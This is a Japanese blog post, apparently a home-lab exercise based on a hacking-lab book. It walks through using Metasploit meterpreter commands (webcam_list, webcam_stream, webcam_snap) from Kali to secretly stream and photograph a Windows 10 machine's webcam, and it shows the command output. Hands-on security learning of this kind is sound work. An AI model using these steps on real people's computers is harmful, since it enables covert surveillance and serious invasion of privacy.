Windows 10 を遠隔操作し盗撮を行う方法

Windows 10

今回は、Kali から Windows 10 を遠隔操作し、WEBカメラから盗撮を行ってみます。

cheese インストール

Kali で使う WEB カメラアプリケーションとして、cheese をインストールします。

root@kali:~# apt install cheese

コマンドを実行すると cheese をインストールできます。起動すると以下のような画面が表示されます。

WEBカメラ接続確認

meterpreter プロンプトで「webcam_list」を実行すると、ターゲット端末でWEBカメラが接続されているかどうか確認することができます。
以下のようにカメラ名が表示されれば、WEBカメラが接続されているということがわかります。

meterpreter > webcam_list
1: VirtualBox Webcam - LG Camera

WEBカメラのストリーム映像を出力

コマンドの実行(失敗)

WEBカメラが接続されていることを確認したので、映像を Kali に出力させます。
ストリーム映像を出力させる場合には「webcam_stream」と実行します。

meterpreter > webcam_stream 
[*] Starting...
[*] Preparing player...
[*] Opening player at: /root/CqTprUyW.html
[*] Streaming...
[34919:34919:0314/050957.315623:ERROR:zygote_host_impl_linux.cc(89)] Running as root without --no-sandbox is not supported. See https://crbug.com/638180.

エラー発生

すると上記のようにエラーが出力されました。
「ハッキングラボのつくりかた」にはエラーが出力されるといった情報はなかったですが、エラーメッセージを見るに「–no-sandbox」というオプションがないとNGなようです。

なお 「–no-sandbox」 というオプションはその名の通り Sandbox を使用しないという意味です。
Sandbox とは独立した仮想環境でプログラムを動作させるセキュリティ技術のことで、攻撃を受けても被害が他箇所に及びません。

というわけで、 「–no-sandbox」 をつけて実行してみましたが、同じく失敗してしまいました。

meterpreter > webcam_stream --no-sandbox
[*] Starting...
[*] Preparing player...
[*] Opening player at: /root/GKegPVFH.html
[*] Streaming...
[35620:35620:0314/053733.650458:ERROR:zygote_host_impl_linux.cc(89)] Running as root without --no-sandbox is not supported. See https://crbug.com/638180.

起動ブラウザの変更

そもそもこのエラー自体 Chromium Browser 関連のものですが、「ハッキングラボのつくりかた」には Firefox が起動されると書かれています。
試しに Chromium Browser をダブルクリックしても起動しなかったため、Chromium Browser 自体に問題があるのかもしれません。
そのため、既定の起動ブラウザを Firefox にしてみます。
以下のように、html ファイルのプロパティから起動ブラウザを変更できます。

(2020/3/28 追記)
Chromium Browser に問題があるのではなく、root ユーザでは Chromium 系のブラウザは起動しないようです。kali ユーザでは起動できることを確認しました。

コマンドの実行(成功)

「webcam_stream」コマンドを再度実行してみます。

meterpreter > webcam_stream
[*] Starting...
[*] Preparing player...
[*] Opening player at: /root/dvZiVwrk.html
[*] Streaming...
[Parent 35715, Gecko_IOThread] WARNING: pipe error (42): Connection reset by peer: file /build/firefox-esr-2hV3zm/firefox-esr-68.5.0esr/ipc/chromium/src/chrome/common/ipc_channel_posix.cc, line 358

すると、ブラウザが起動し Windows 10 の WEB カメラによるストリーム映像が出力されました。(加工処理しています)

WEBカメラによる撮影

先程はストリーム映像を出力させましたが、次はカメラ撮影をしその画像を Kali に保存します。
「webcam_snap」コマンドを実行することで撮影することができます。

meterpreter > webcam_snap
[*] Starting...
[+] Got frame
[*] Stopped
Webcam shot saved to: /root/XaVHftAn.jpeg
meterpreter >

コマンドを実行すると Firefox が起動し、撮影した画像が表示されます。

root 配下に jpeg ファイルが保存されていることも確認できました。

root@kali:~# ls /root | grep .jpeg
AUVjhqjG.jpeg
LNUfqRDL.jpeg
QqPIRCWb.jpeg
XaVHftAn.jpeg
root@kali:~#

今回は以上です。

くどり

この記事は「ハッキング・ラボのつくりかた 第4章 」をベースに作成しています。購入リンクは以下です。
※Amazonアソシエイトを使用しています。

コメント

タイトルとURLをコピーしました